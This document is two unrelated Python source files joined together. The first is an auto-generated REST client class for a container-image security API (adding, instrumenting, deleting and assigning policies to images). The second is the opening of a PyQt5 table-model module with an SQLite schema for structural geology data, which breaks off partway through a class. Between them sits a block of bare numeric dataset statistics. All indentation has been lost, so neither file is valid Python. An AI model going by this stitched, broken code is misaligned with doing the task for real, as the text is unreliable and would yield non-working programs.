from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class ImageApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def add_image(self, **kwargs):
"""
Create new image definition
Creates an image object. ID SHOULD NOT be passed when creating a new image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_image(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Image image:
:param str instrument_image: Set to \"true\" to instrument image at time of API call
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.add_image_with_http_info(**kwargs)
else:
(data) = self.add_image_with_http_info(**kwargs)
return data
def add_image_with_http_info(self, **kwargs):
"""
Create new image definition
Creates an image object. ID SHOULD NOT be passed when creating a new image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.add_image_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Image image:
:param str instrument_image: Set to \"true\" to instrument image at time of API call
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image', 'instrument_image']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_image" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'instrument_image' in params:
query_params.append(('InstrumentImage', params['instrument_image']))
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'image' in params:
body_params = params['image']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
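# Usage sketch for the pair of methods above (assumes a configured ApiClient
# pointing at a reachable Witness/Control server; the image body is a
# placeholder, not a documented payload):
#
#   api = ImageApi()
#   created = api.add_image(image={'Name': 'alpine:3.7'})        # synchronous
#   thread = api.add_image(image={'Name': 'alpine:3.7'},
#                          callback=lambda resp: print(resp))    # asynchronous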
def assign_configuration_to_image(self, image_id, config_id, **kwargs):
"""
Assign configuration to image
Assigns the specified configuration to the specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.assign_configuration_to_image(image_id, config_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:param str config_id: hexadecimal ID of configuration to assign to image (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.assign_configuration_to_image_with_http_info(image_id, config_id, **kwargs)
else:
(data) = self.assign_configuration_to_image_with_http_info(image_id, config_id, **kwargs)
return data
def assign_configuration_to_image_with_http_info(self, image_id, config_id, **kwargs):
"""
Assign configuration to image
Assigns the specified configuration to the specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.assign_configuration_to_image_with_http_info(image_id, config_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:param str config_id: hexadecimal ID of configuration to assign to image (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image_id', 'config_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method assign_configuration_to_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'image_id' is set
if ('image_id' not in params) or (params['image_id'] is None):
raise ValueError("Missing the required parameter `image_id` when calling `assign_configuration_to_image`")
# verify the required parameter 'config_id' is set
if ('config_id' not in params) or (params['config_id'] is None):
raise ValueError("Missing the required parameter `config_id` when calling `assign_configuration_to_image`")
collection_formats = {}
path_params = {}
if 'image_id' in params:
path_params['imageID'] = params['image_id']
if 'config_id' in params:
path_params['configID'] = params['config_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/{imageID}/Configs/{configID}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def assign_policy_to_image(self, image_id, policy_id, **kwargs):
"""
Assign security policy to image
Assigns the specified security policy to the specified image. Running containers will update to the new policy within one minute.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.assign_policy_to_image(image_id, policy_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:param str policy_id: hexadecimal ID of policy to assign to image (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.assign_policy_to_image_with_http_info(image_id, policy_id, **kwargs)
else:
(data) = self.assign_policy_to_image_with_http_info(image_id, policy_id, **kwargs)
return data
def assign_policy_to_image_with_http_info(self, image_id, policy_id, **kwargs):
"""
Assign security policy to image
Assigns the specified security policy to the specified image. Running containers will update to the new policy within one minute.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.assign_policy_to_image_with_http_info(image_id, policy_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:param str policy_id: hexadecimal ID of policy to assign to image (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image_id', 'policy_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method assign_policy_to_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'image_id' is set
if ('image_id' not in params) or (params['image_id'] is None):
raise ValueError("Missing the required parameter `image_id` when calling `assign_policy_to_image`")
# verify the required parameter 'policy_id' is set
if ('policy_id' not in params) or (params['policy_id'] is None):
raise ValueError("Missing the required parameter `policy_id` when calling `assign_policy_to_image`")
collection_formats = {}
path_params = {}
if 'image_id' in params:
path_params['imageID'] = params['image_id']
if 'policy_id' in params:
path_params['policyID'] = params['policy_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/{imageID}/Policies/{policyID}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_image(self, image_id, **kwargs):
"""
Delete specified image
Deletes the specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_image(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_image_with_http_info(image_id, **kwargs)
else:
(data) = self.delete_image_with_http_info(image_id, **kwargs)
return data
def delete_image_with_http_info(self, image_id, **kwargs):
"""
Delete specified image
Deletes the specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_image_with_http_info(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to delete (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'image_id' is set
if ('image_id' not in params) or (params['image_id'] is None):
raise ValueError("Missing the required parameter `image_id` when calling `delete_image`")
collection_formats = {}
path_params = {}
if 'image_id' in params:
path_params['imageID'] = params['image_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/{imageID}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_image(self, image_id, **kwargs):
"""
Get specified container image
Returns details about specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_image(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to get (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_image_with_http_info(image_id, **kwargs)
else:
(data) = self.get_image_with_http_info(image_id, **kwargs)
return data
def get_image_with_http_info(self, image_id, **kwargs):
"""
Get specified container image
Returns details about specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_image_with_http_info(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to get (required)
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'image_id' is set
if ('image_id' not in params) or (params['image_id'] is None):
raise ValueError("Missing the required parameter `image_id` when calling `get_image`")
collection_formats = {}
path_params = {}
if 'image_id' in params:
path_params['imageID'] = params['image_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/{imageID}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_images(self, **kwargs):
"""
Get defined container images
Returns a list of defined images that are accessible to this user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_images(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: Images
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_images_with_http_info(**kwargs)
else:
(data) = self.get_images_with_http_info(**kwargs)
return data
def get_images_with_http_info(self, **kwargs):
"""
Get defined container images
Returns a list of defined images that are accessible to this user.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_images_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: Images
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_images" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Images',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def instrument_image(self, image_id, **kwargs):
"""
Request instrumentation of specified container image
Requests instrumentation of the specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.instrument_image(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.instrument_image_with_http_info(image_id, **kwargs)
else:
(data) = self.instrument_image_with_http_info(image_id, **kwargs)
return data
def instrument_image_with_http_info(self, image_id, **kwargs):
"""
Request instrumentation of specified container image
Requests instrumentation of the specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.instrument_image_with_http_info(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to instrument (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method instrument_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'image_id' is set
if ('image_id' not in params) or (params['image_id'] is None):
raise ValueError("Missing the required parameter `image_id` when calling `instrument_image`")
collection_formats = {}
path_params = {}
if 'image_id' in params:
path_params['imageID'] = params['image_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/{imageID}/Instrument', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None,
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def number_of_instrumented_images(self, **kwargs):
"""
Returns number of instrumented images
Returns the number of instrumented images belonging to a user's group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.number_of_instrumented_images(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.number_of_instrumented_images_with_http_info(**kwargs)
else:
(data) = self.number_of_instrumented_images_with_http_info(**kwargs)
return data
def number_of_instrumented_images_with_http_info(self, **kwargs):
"""
Returns number of instrumented images
Returns the number of instrumented images belonging to a user's group.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.number_of_instrumented_images_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:return: InlineResponse200
If the method is called asynchronously,
returns the request thread.
"""
all_params = []
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method number_of_instrumented_images" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/NumberOfInstrumentedImages', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse200',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def show_container_running_image(self, image_id, **kwargs):
"""
Get containers running specified image
Lists containers that are running specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.show_container_running_image(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to get containers for (required)
:return: Container
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.show_container_running_image_with_http_info(image_id, **kwargs)
else:
(data) = self.show_container_running_image_with_http_info(image_id, **kwargs)
return data
def show_container_running_image_with_http_info(self, image_id, **kwargs):
"""
Get containers running specified image
Lists containers that are running specified image.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.show_container_running_image_with_http_info(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to get containers for (required)
:return: Container
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image_id']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method show_container_running_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'image_id' is set
if ('image_id' not in params) or (params['image_id'] is None):
raise ValueError("Missing the required parameter `image_id` when calling `show_container_running_image`")
collection_formats = {}
path_params = {}
if 'image_id' in params:
path_params['imageID'] = params['image_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/{imageID}/Containers', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Container',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def update_image(self, image_id, **kwargs):
"""
Update image definition
Updates an existing image object.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_image(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to update (required)
:param Image image:
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_image_with_http_info(image_id, **kwargs)
else:
(data) = self.update_image_with_http_info(image_id, **kwargs)
return data
def update_image_with_http_info(self, image_id, **kwargs):
"""
Update image definition
Updates an existing image object.
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_image_with_http_info(image_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str image_id: hexadecimal ID of image to update (required)
:param Image image:
:return: Image
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['image_id', 'image']
all_params.append('callback')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_image" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'image_id' is set
if ('image_id' not in params) or (params['image_id'] is None):
raise ValueError("Missing the required parameter `image_id` when calling `update_image`")
collection_formats = {}
path_params = {}
if 'image_id' in params:
path_params['imageID'] = params['image_id']
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'image' in params:
body_params = params['image']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['ApiKey']
return self.api_client.call_api('/Images/{imageID}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Image',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
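# Configuration sketch: every endpoint in this class declares the 'ApiKey'
# auth setting, so a key must be registered on the shared Configuration before
# any call. The key name 'Authorization' is an assumption; the actual name is
# defined by the OpenAPI spec.
#
#   from layint_runtime_api.configuration import Configuration
#   config = Configuration()
#   config.api_key['Authorization'] = 'REPLACE_WITH_API_KEY'
#   images = ImageApi().get_images()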
| 42.154889
| 284
| 0.566757
| 4,436
| 43,546
| 5.32349
| 0.04982
| 0.031124
| 0.023714
| 0.030489
| 0.949608
| 0.938683
| 0.932162
| 0.917976
| 0.910015
| 0.899471
| 0
| 0.000537
| 0.359092
| 43,546
| 1,032
| 285
| 42.195736
| 0.845605
| 0.344211
| 0
| 0.782869
| 0
| 0
| 0.155041
| 0.041595
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041833
| false
| 0
| 0.013944
| 0
| 0.11753
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c76e42d7e5572116be91dc3d8bc5dbc02c2b514f
| 17,459
|
py
|
Python
|
pysdb3/models.py
|
ondrolexa/pysdb
|
965af226eb10f1b93f2437b201e1fcb5af3fa900
|
[
"MIT"
] | 1
|
2018-05-01T20:02:39.000Z
|
2018-05-01T20:02:39.000Z
|
pysdb3/models.py
|
ondrolexa/pysdb
|
965af226eb10f1b93f2437b201e1fcb5af3fa900
|
[
"MIT"
] | null | null | null |
pysdb3/models.py
|
ondrolexa/pysdb
|
965af226eb10f1b93f2437b201e1fcb5af3fa900
|
[
"MIT"
] | 2
|
2018-02-16T20:09:37.000Z
|
2020-09-30T19:18:46.000Z
|
from PyQt5 import QtCore, QtGui, QtWidgets
sitecol = {'id': 0, 'name': 1, 'x': 2, 'y': 3, 'desc': 4, 'id_units': 5}
datacol = {'id': 0, 'id_sites': 1, 'id_struct': 2, 'azi': 3, 'inc': 4, 'struct': 5, 'desc': 6, 'tags': 7}
structurecol = {'id': 0, 'structure': 1, 'planar': 2, 'desc': 3, 'scode': 4, 'gcode': 5}
unitcol = {'id': 0, 'name': 1, 'desc': 2}
tagcol = {'id': 0, 'name': 1, 'desc': 2, 'check': 3}
SCHEMA = '''pragma auto_vacuum=0;
pragma default_cache_size=2000;
pragma encoding='UTF-8';
pragma page_size=1024;
drop table if exists sites;
CREATE TABLE sites (id integer NOT NULL PRIMARY KEY AUTOINCREMENT, id_units integer NOT NULL DEFAULT 0, name varchar(16) NOT NULL DEFAULT '', x_coord double DEFAULT NULL, y_coord double DEFAULT NULL, description text);
drop table if exists structdata;
CREATE TABLE structdata (id integer NOT NULL PRIMARY KEY AUTOINCREMENT, id_sites integer NOT NULL DEFAULT 0, id_structype integer NOT NULL DEFAULT 0, azimuth double NOT NULL DEFAULT 0, inclination double NOT NULL DEFAULT 0, description text);
drop table if exists structype;
CREATE TABLE structype (id integer NOT NULL PRIMARY KEY AUTOINCREMENT, pos integer NOT NULL DEFAULT 0, structure varchar(16) NOT NULL UNIQUE, description text, structcode integer DEFAULT NULL, groupcode integer DEFAULT NULL, planar integer DEFAULT 1);
drop table if exists tagged;
CREATE TABLE tagged (id integer NOT NULL PRIMARY KEY AUTOINCREMENT, id_tags integer NOT NULL DEFAULT 0, id_structdata integer NOT NULL DEFAULT 0);
drop table if exists tags;
CREATE TABLE tags (id integer NOT NULL PRIMARY KEY AUTOINCREMENT, pos integer NOT NULL DEFAULT 0, name varchar(16) NOT NULL UNIQUE, description text);
drop table if exists units;
CREATE TABLE units (id integer NOT NULL PRIMARY KEY AUTOINCREMENT, pos integer NOT NULL DEFAULT 0, name varchar(60) NOT NULL UNIQUE, description text);
drop table if exists attach;
CREATE TABLE attach (id integer NOT NULL PRIMARY KEY AUTOINCREMENT, id_structdata_planar integer NOT NULL DEFAULT '0', id_structdata_linear integer NOT NULL DEFAULT '0');
drop table if exists meta;
CREATE TABLE meta (id integer NOT NULL PRIMARY KEY AUTOINCREMENT, name varchar(16) NOT NULL UNIQUE, value text);'''
DEFDATA = '''INSERT INTO structype VALUES (1, 1,'S', 'Default planar feature', 35, 13, 1);
INSERT INTO structype VALUES (2, 2, 'L', 'Default linear feature', 78, 13, 0);
INSERT INTO units VALUES (1, 1, 'Default', 'Default unit');'''
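# Bootstrap sketch: SCHEMA and DEFDATA are plain multi-statement SQL scripts,
# so a fresh project database can be created with sqlite3.executescript().
# The file name below is a placeholder.
#
#   import sqlite3
#   conn = sqlite3.connect('project.sdb3')
#   conn.executescript(SCHEMA)
#   conn.executescript(DEFDATA)
#   conn.commit()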
class SiteModel(QtCore.QAbstractTableModel):
# Here we define model to store sites table data
def __init__(self, mlist, parent=None):
super(SiteModel, self).__init__(parent)
# Cache the passed data list as a class member.
self._items = mlist
# Create lookup dictionaries
self.updateIndex()
def updateIndex(self):
""" Update lookup dictionaries for id and row. """
self.id2row = {}
self.row2id = {}
for idx,row in enumerate(self._items):
self.id2row[row[0]] = idx
self.row2id[idx] = row[0]
def rowCount(self, index=QtCore.QModelIndex()):
""" Returns the number of rows the model holds. """
return len(self._items)
def columnCount(self, index=QtCore.QModelIndex()):
""" Returns the number of columns the model holds. """
return len(sitecol)
def data(self, index, role = QtCore.Qt.DisplayRole):
""" Depending on the index and role given, return data. If not
returning data, return None (PySide equivalent of QT's
"invalid QVariant").
"""
if not index.isValid():
return None
if not 0 <= index.row() < len(self._items):
return None
if role == QtCore.Qt.DisplayRole:
# The view is asking for the actual data, so, just return the item it's asking for.
return self._items[index.row()][index.column()]
elif role == QtCore.Qt.ToolTipRole:
# The view is asking for tooltip data, so, we just return description.
return self._items[index.row()][sitecol['desc']]
else:
# We don't care about anything else, so make sure to return None.
return None
def getRow(self, index):
""" Returns model row. """
return self._items[index.row()]
def updateRow(self, index, datarow):
""" Updates model row. """
self._items[index.row()] = datarow
self.dataChanged.emit(index, index)
# self.emit(QtCore.SIGNAL('dataChanged(QModelIndex,QModelIndex)'), index, index)
def appendRow(self, datarow):
""" Append model row. """
self.beginInsertRows(QtCore.QModelIndex(), len(self._items), len(self._items))
self._items.append(datarow)
self.endInsertRows()
self.updateIndex()
def removeRow(self, index):
""" Remove model row. """
self.beginRemoveRows(QtCore.QModelIndex(), index.row(), index.row())
del self._items[index.row()]
self.endRemoveRows()
self.updateIndex()
def headerData(self, section, orientation, role=QtCore.Qt.DisplayRole):
""" Set the headers to be displayed. """
if role != QtCore.Qt.DisplayRole:
return None
if orientation == QtCore.Qt.Horizontal:
if section == sitecol['name']:
return 'Site'
else:
return None
return None
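# Usage sketch: SiteModel (and the models below) follow the standard
# QAbstractTableModel contract, so they plug directly into Qt item views.
# The row values are assumptions that mirror the sitecol lookup dict.
#
#   app = QtWidgets.QApplication([])
#   model = SiteModel([[1, 'SITE01', 452300.0, 5550100.0, 'outcrop', 1]])
#   view = QtWidgets.QTableView()
#   view.setModel(model)
#   view.show()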
class StructureModel(QtCore.QAbstractTableModel):
# Here we define model to store structures table data
def __init__(self, mlist, parent=None):
super(StructureModel, self).__init__(parent)
